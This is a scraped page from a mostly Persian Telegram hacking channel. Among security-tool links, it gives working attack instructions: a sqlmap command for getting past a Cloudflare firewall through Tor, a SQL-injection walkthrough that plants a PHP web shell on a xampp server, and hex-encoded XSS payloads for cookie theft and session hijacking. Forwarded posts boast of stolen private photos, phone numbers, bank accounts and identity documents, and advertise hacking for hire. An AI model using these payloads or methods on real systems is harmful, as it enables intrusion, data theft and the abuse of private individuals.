3.6K subscribers
1.62K photos
220 videos
73 files
1.44K links
Download Telegram
CHOMTE.SH is a powerful shell script designed to automate reconnaissance tasks during penetration testing. It utilizes various Go-based tools to gather information and identify the attack surface, making it a valuable asset for bug bounty hunters and penetration testers.

https://github.com/mr-rizwan-syed/chomtesh

#NULL🖤
https://t.me/Kali_Linux_NULL
PassDetective is a command-line tool that scans shell command history to detect mistakenly written passwords, API keys, and secrets. Using regular expressions, it helps prevent accidental exposure of sensitive information in your command history.

https://github.com/aydinnyunus/PassDetective

#NULL🖤
https://t.me/Kali_Linux_NULL
NULL
Photo
A forensic tool to make analysis of email headers easy to aid in the quick discovery of the attacker.

mailMeta is a python based forensic tool which reads through the email headers from the email file and extracts crucial information to identify if the email is legitimate.

What are the advantages of using mailMeta?
Have you ever heared of email hacking or sophisticated email crimes where a spoofed email is sent to the victim and the victim trusts this email based on the email address which is infact fake. These email contains mallicious links which can be used to extract some information or install some malware or backdoors on your device. So, in order to avoid you from this mailMeta comes to your rescue.

Here I have added instructions on how to download the email from the file and then pass it to the mailMeta executable. It then parses the headers and informs you if the mail is genuine or not. Whenever you are suspicious about an email be sure to check it once here. It can save you in most of the scenarios. If anyone has some ideas/updates feel free to open an issue or create a pull request.

What are the information revealed by the mailMeta? mailMeta parses the following headers:

Message-ID
SPF-Record
DKIM-Record
DMARC-Record
Spoofed Email detection based on the above headers
IP-Address of the sender
Service Provider used for sending the email
Content-Type
Data and Time

https://github.com/gr33nm0nk2802/mailMeta

#NULL🖤
https://t.me/Kali_Linux_NULL
Forwarded from 🔗لینک شیشه ای|Glass link
سورس برای خاموش کردن ویندوز تارگت از راه دور
#NULL🖤
https://t.me/Kali_Linux_NULL
کد: DAPPS

D: -•• (نقطه خط تیره)
A: •- (خط تیره)
P: •--• (نقطه خط تیره)
P: •--• (نقطه خط تیره)
#NULL🖤
https://t.me/Kali_Linux_NULL
Forwarded from زاپاس
🎃رفع فیلتری روبیکا آموزشش فروخته می‌شود میتونی تو ۴ساعت اکانت روبیکات رفع کنی😱🔰
@Radkor_report
آیدی بنده☝️
https://t.me/Kali_Linux_NULL
https://t.me/Program_writing
Forwarded from هک شدگان
بسم رب چشای اونی که کنارم نیست🖤

زدن تیمNULL چند اتک کوچیک
Targat1
زدن471قفلی روبیکا🔰
Targat2
هک شدن چند عکس دختر
Shot  Shot  Shot  Shot  Shot  Shot  Shot  Shot  Shot  Shot  Shot  Shot  Shot  Shot Shot Shot Shot Shot Shot Shot Shot
Targat3
13شماره هک شده توسط بنده

Targat4
چند شناسنامه های فرد
Shot  Shot  Shot
Targat5
چند مدارک دادگاهی یه فرد 🐇
Shot  Shot  Shot  Shot  Shot Shot Shot

برای درخواست هک پی بنده🎃
@Radkor_report

معاشرت گپ چنلمون🧪
https://t.me/NULL_KALI_LINUX
ابزار گرفتن api hash, api id اکانت تلگرام

با این ابزار به سادگی api های اکانتتون رو بگیرید!

اگه براتون ارور اپدیت داد، باید حمایت کنید تا نسخه جدید برای ساخت api رو هم اضافه کنم

بدرود:)



Git:  https://github.com/esfelurm/Apis-Telegram

#NULL🖤
https://t.me/Kali_Linux_NULL
Forwarded from زاپاس
base.apk
4 MB
خب خب اینم یک تلگرام پریوم میتونین ازش استفاده کنین🎃
قابلیت استوری گذاشتن🐇
با شماره مجازی رفتن🫀
تیکه آبی گذاشتن🫁
بدون بن شدن🪼
بدون لگ🐳
😐✈️ برترین پوشه تلگرام!!

☯️🫥با کلیک روی لینک زیر بهترین پوشه تلگرام رو برای خودت ذخیره کن و ازشون نهایت استفاده را انجام بده ::😀🔴

🟣 https://t.me/addlist/07jxWClVpHgwZmY0 🫥❗️

🫥🚨 به شدت مهم▶️▶️▶️
Please open Telegram to view this post
VIEW IN TELEGRAM
نحوه بای پس WAF با sqlmap

اول از همه، شما باید مطمئن شوید که سایت مورد نظر توسط Cloudflare محافظت می شود، می توانید برای تایید " — ID-waf" را اضافه کنید. با این حال، " — thread=" را بزرگتر از 1 قرار ندهید زیرا هدف به شما خطای "403 Forbidden" می دهد. هنگامی که "خطای 403" را دریافت کردید، آدرس IP شما بلاک می شود. بنابراین، شما باید در نظر داشته باشید که از سرورهای پروکسی یا TOR برای دسترسی به هدف استفاده کنید.

شما باید " — tamper='between,randomcase,space2comment'" و "-v 3" رو اضافه کنید ، در صورتی که هدف محافظت شده توسط Cloudflare تایید شده باشد. همچنین می‌توانید در صورت لزوم «--random-agent» و «-tor» را اضافه کنید.

برای استفاده موفقیت آمیز tor ممکن است نیاز به نصب privoxy داشته باشید

sudo apt install privoxy -y 
sudo /etc/init.d/privoxy start
در نهایت حمله را شروع کنید!

python sqlmap.py -u "https://www.target.com/" --identify-waf --tamper="between,randomcase,space2comment" -v 3 --random-agent --tor
#Sqlmap


#NULL🖤
https://t.me/Kali_Linux_NULL
اولین کاری که انجام می دهیم این است که بررسی کنیم sql در کجا روی سرور اجرا می شود. این کار با تزریق دستور  @@datadir به پرس و جوی sql انجام می شود تا مسیر کامل مکان آن در سرور به دست آید.

مثال:

با فرض اینکه بازتابی را در ستون دوم پیدا کنیم، بار زیر را وارد خواهیم کرد:


union select 1,@@datadir,3,4 --
و خروجی به صورت زیر خواهد بود:

C:\xampp\mysql\data\

چگونه SQLI به RCE را اجرا کنیم؟

با توجه به مسیر می توانیم استنباط کنیم که سرور از xampp استفاده می کند و اگر بخواهیم یک فایل ایجاد کنیم و از سرور به آن دسترسی داشته باشیم باید آن را در C:\xampp\htdocs

با توجه به این اطلاعات، در حال حاضر امکان ایجاد پیلود برای شل وجود دارد:
union select 1,<php_payload>,3,4 into outfile <path> --

مثال:
union select 1,'<?php system($_GET["cmd"]); ?>',3,4 intooutfile 'C:\\xampp\\htdocs\\rce.php' --

و تمام، ما یک شل معکوس در سیستم ایجاد کردیم. اکنون فقط برای دسترسی به آن از خارج (وب) باقی مانده است. و این کار از لینک زیر انجام می شود:

<host>/rce.php?cmd=<command>
برای رسیدن به SiXSS باید مراحل زیر را طی کنیم.

من این روش را خیلی دوست ندارم زیرا خطا را در صفحه وب فلش می کند و در بسیاری از موارد ممکن است کل صفحه را دریافت نکنید، اما فقط یک صفحه خالی با خطا است و اصلا جالب نیست. اما از آنجایی که این یکی از راه‌ها نیز هست، به عنوان مثال یک وب‌سایت آسیب‌پذیر را در نظر می‌گیریم.

exploitable-web.com/link.php?id=1

وقتی یک نقل قول را در انتهای وب سایت قرار می دهیم ممکن است با خطای مشابه مواجه شویم.

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1'' at line 1
خوب این اولین نکته ای است که می توانیم XSS را به وب سایت تزریق کنیم. بنابراین این بار به جای تنها نقل قول، این را تزریق می کنیم:

' ;<img src=x onerror=prompt(/XSS/)>
تزریق بالا یک کادر محاوره ای را نشان می دهد که XSS می گوید. این یکی حمله اساسی است. حالا بیایید ببینیم چگونه می توانیم XSS را به روشی بهتر تزریق کنیم. تزریق XSS به Query. هنگامی که دریافت Number of Column انجام شد و ما برای Union Query آماده هستیم. فرض کنید 4 ستون داریم، بنابراین کوئری اتحادیه ما به صورت زیر خواهد بود:
http://exploitable-web.com/link.php?id=1' union select 1,2,3,4--
فرض کنید ستون 3 به عنوان خروجی در صفحه وب چاپ می شود. بنابراین بار XSS خود را به آن تزریق می کنیم. برای ساده کردن کارها، بار خود را به صورت هگز کدگذاری می کنیم. بار تزریق XSS ما :

<img src=x onerror=confirm(/XSS/)>
مقدار کدگذاری شده Hex :
0x3c696d67207372633d78206f6e6572726f723d636f6e6669726d282f5853532f293e
تزریق پیلود ما:
http://exploitable-web.com/link.php?id=-1' union select 1,2,0x3c696d67207372633d78206f6e6572726f723d636f6e6669726d282f5853532f293e,4--
لینک XSS ما را به وب سایت خروجی می دهد. این یکی از پیلود های اولیه XSS است، اکنون ما آزاد هستیم تا با استفاده از XSS کارهای دیگری مانند سرقت کوکی، فیشینگ XSS، فیشینگ XSS iFrame، XSS زنجیره‌ای، ربودن جلسه، حمله CSRF، XssDdos و سایر حملات را انجام دهیم .

جمع اوری و ترجمه شده از سایت Sqli to Xss
Forwarded from زاپاس
🎃رفع فیلتری روبیکا آموزشش فروخته می‌شود میتونی تو ۴ساعت اکانت روبیکات رفع کنی😱🔰
@Radkor_report
آیدی بنده☝️
https://t.me/Kali_Linux_NULL
https://t.me/Program_writing
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from هک شدگان
بسم رب چشای اونی که کنارم نیست🖤

زدن تیمNULL چند اتک کوچیک
Targat1
زدن قفلی483تا روبیکا🔰
Targat2
هک شدن چند عکس دختر
Shot  Shot  Shot  Shot  Shot  Shot  Shot  Shot  Shot  Shot  Shot  Shot  Shot  Shot Shot Shot Shot Shot Shot Shot Shot Shot Shot Shot Shot Shot Shot Shot Shot Shot Shot Shot Shot
Targat3
13شماره هک شده توسط بنده

Targat4
هک کردن چند شماره حساب بانکی
Targat5
چند شناسنامه های فرد
Shot  Shot  Shot Shot
Targat6
چند مدارک دادگاهی یه فرد 🐇
Shot  Shot  Shot  Shot  Shot Shot Shot Shot Shot
Targat7
هک شدن چند ایمیل

برای درخواست هک پی بنده🎃
@Radkor_report

معاشرت گپ چنلمون🧪
https://t.me/NULL_KALI_LINUX
بررسی آسیب‌پذیری‌های بازنشانی رمز عبور

[View]

حتما بخونید
#NULL🖤
https://t.me/Kali_Linux_NULL